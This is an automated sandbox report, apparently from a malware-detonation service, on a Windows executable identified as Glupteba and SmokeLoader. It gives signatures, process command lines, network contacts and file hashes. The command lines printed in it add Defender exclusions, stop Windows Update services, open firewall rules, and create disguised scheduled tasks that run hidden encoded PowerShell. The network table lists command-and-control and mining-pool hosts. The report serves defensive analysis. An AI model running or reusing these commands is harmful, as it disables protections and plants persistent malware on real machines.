Analysis Overview
SHA256
fae531687cc458d8d7e504b81776514eec3cd9700891a1b873afa3748c84cc78
Threat Level: Known bad
The file allnewumm.exe was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Glupteba
PrivateLoader
UAC bypass
SmokeLoader
Windows security bypass
Detected executables Discord URL observed in first stage droppers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Stops running service(s)
Checks computer location settings
Checks BIOS information in registry
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Themida packer
Executes dropped EXE
UPX packed file
Windows security modification
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Creates scheduled task(s)
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-21 22:51
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-21 22:51
Reported
2023-11-21 22:54
Platform
win7-20231020-en
Max time kernel
8s
Max time network
149s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
Detected executables Discord URL observed in first stage droppers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2856 set thread context of 1716 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\allnewumm.exe
"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Users\Admin\AppData\Local\Temp\Random.exe
"C:\Users\Admin\AppData\Local\Temp\Random.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231121225237.log C:\Windows\Logs\CBS\CbsPersist_20231121225237.cab
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe
"C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe"
C:\Users\Admin\Pictures\y21BWXLSetSymUVPYoQhMk6V.exe
"C:\Users\Admin\Pictures\y21BWXLSetSymUVPYoQhMk6V.exe"
C:\Users\Admin\Pictures\oTYnKcA5mm9jshIDchCMeOvK.exe
"C:\Users\Admin\Pictures\oTYnKcA5mm9jshIDchCMeOvK.exe" --silent --allusers=0
C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe
"C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe"
C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe
"C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe"
C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe
"C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe"
C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSAA53.tmp\Install.exe
.\Install.exe /IuCdidQXCBm "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXngEgmba" /SC once /ST 07:13:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXngEgmba"
C:\Windows\system32\taskeng.exe
taskeng.exe {5F464B45-1C3E-4674-89FA-E7D49161E213} S-1-5-21-1154728922-3261336865-3456416385-1000:TLIDUQCQ\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe
"C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe"
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\system32\taskeng.exe
taskeng.exe {148EF647-0594-4E96-9E7E-28F5180B30FC} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\DBFHDHJKKJ.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXngEgmba"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe
"C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\FHCGCAAKJD.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 22:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\MleYOBj.exe\" rd /ctsite_idMSp 385118 /S" /V1 /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\explorer.exe
C:\Windows\explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 188.114.96.0:443 | yip.su | tcp |
| US | 8.8.8.8:53 | gobo23cl.top | udp |
| US | 8.8.8.8:53 | julimichkids.online | udp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 8.8.8.8:53 | gobo24cl.top | udp |
| MY | 111.90.146.230:80 | tcp | |
| US | 8.8.8.8:53 | redirector.pm | udp |
| US | 8.8.8.8:53 | lycheepanel.info | udp |
| US | 8.8.8.8:53 | rawcracker.com | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 194.49.94.67:80 | tcp | |
| DE | 88.198.22.18:443 | julimichkids.online | tcp |
| US | 172.67.215.14:80 | gobo23cl.top | tcp |
| US | 104.21.93.225:443 | flyawayaero.net | tcp |
| US | 188.114.97.0:80 | rawcracker.com | tcp |
| US | 188.114.97.0:443 | rawcracker.com | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| US | 104.21.32.208:443 | lycheepanel.info | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 172.67.215.14:443 | gobo23cl.top | tcp |
| US | 188.114.97.0:443 | rawcracker.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | bobkelsofan.com | udp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| US | 172.67.169.68:443 | bobkelsofan.com | tcp |
| NL | 88.221.25.153:80 | apps.identrust.com | tcp |
| US | 104.21.35.235:443 | potatogoose.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| US | 95.214.26.28:80 | host-host-file8.com | tcp |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| DE | 49.13.94.153:443 | tcp | |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| FR | 51.15.193.130:14433 | xmr-eu1.nanopool.org | tcp |
Files
memory/2508-0-0x0000000074730000-0x0000000074E1E000-memory.dmp
memory/2508-1-0x0000000000C60000-0x0000000001B40000-memory.dmp
\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | cba9c1d1fcbf999d9ccb04050c5c5154 |
| SHA1 | 554e436c9c3f1f16c9a9b7ab74dd4cd191118481 |
| SHA256 | c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842 |
| SHA512 | c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b |
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | cba9c1d1fcbf999d9ccb04050c5c5154 |
| SHA1 | 554e436c9c3f1f16c9a9b7ab74dd4cd191118481 |
| SHA256 | c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842 |
| SHA512 | c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 8ef35a51d9b58606554128b7556ceac2 |
| SHA1 | 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30 |
| SHA256 | b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e |
| SHA512 | 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24 |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 8ef35a51d9b58606554128b7556ceac2 |
| SHA1 | 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30 |
| SHA256 | b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e |
| SHA512 | 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 8ef35a51d9b58606554128b7556ceac2 |
| SHA1 | 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30 |
| SHA256 | b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e |
| SHA512 | 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 8ef35a51d9b58606554128b7556ceac2 |
| SHA1 | 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30 |
| SHA256 | b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e |
| SHA512 | 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | cba9c1d1fcbf999d9ccb04050c5c5154 |
| SHA1 | 554e436c9c3f1f16c9a9b7ab74dd4cd191118481 |
| SHA256 | c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842 |
| SHA512 | c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b |
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
| MD5 | 14a535954bf4becdfd4dc6ad7cb45153 |
| SHA1 | d9eb9619e56cf54334e4cb28490113b6a5984c79 |
| SHA256 | 32e227b8c3da4ffbf6a8d5565c2d7695e16096fd24810f4d065aaa58906664ff |
| SHA512 | 6c023d083708947a97c56bf2331f0f4dfebe544d452d1e16b73c6059a3b5ab1b69b4d21478d6851b520c1216213c1de6c51a83f50670cfb86f3e30573ba343b1 |
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
| MD5 | 14a535954bf4becdfd4dc6ad7cb45153 |
| SHA1 | d9eb9619e56cf54334e4cb28490113b6a5984c79 |
| SHA256 | 32e227b8c3da4ffbf6a8d5565c2d7695e16096fd24810f4d065aaa58906664ff |
| SHA512 | 6c023d083708947a97c56bf2331f0f4dfebe544d452d1e16b73c6059a3b5ab1b69b4d21478d6851b520c1216213c1de6c51a83f50670cfb86f3e30573ba343b1 |
\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
| MD5 | 14a535954bf4becdfd4dc6ad7cb45153 |
| SHA1 | d9eb9619e56cf54334e4cb28490113b6a5984c79 |
| SHA256 | 32e227b8c3da4ffbf6a8d5565c2d7695e16096fd24810f4d065aaa58906664ff |
